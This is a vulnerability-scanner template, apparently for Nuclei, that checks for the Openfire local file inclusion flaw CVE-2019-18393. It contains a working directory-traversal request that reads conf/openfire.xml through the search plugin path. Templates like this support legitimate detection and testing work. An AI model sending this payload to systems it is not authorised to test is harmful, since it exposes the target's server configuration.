id: CVE-2019-18393 info: name: Ignite Realtime Openfire <4.42 - Local File Inclusion author: pikpikcu severity: medium description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory. reference: - https://github.com/igniterealtime/Openfire/pull/1498 - https://swarm.ptsecurity.com/openfire-admin-console/ - https://nvd.nist.gov/vuln/detail/CVE-2019-18393 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-18393 cwe-id: CWE-22 tags: cve,cve2019,openfire,lfi requests: - method: GET path: - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml' matchers-condition: and matchers: - type: word words: - "org.jivesoftware.database.EmbeddedConnectionProvider" - "Most properties are stored in the Openfire database" part: body - type: status status: - 200 # Enhanced by mp on 2022/07/22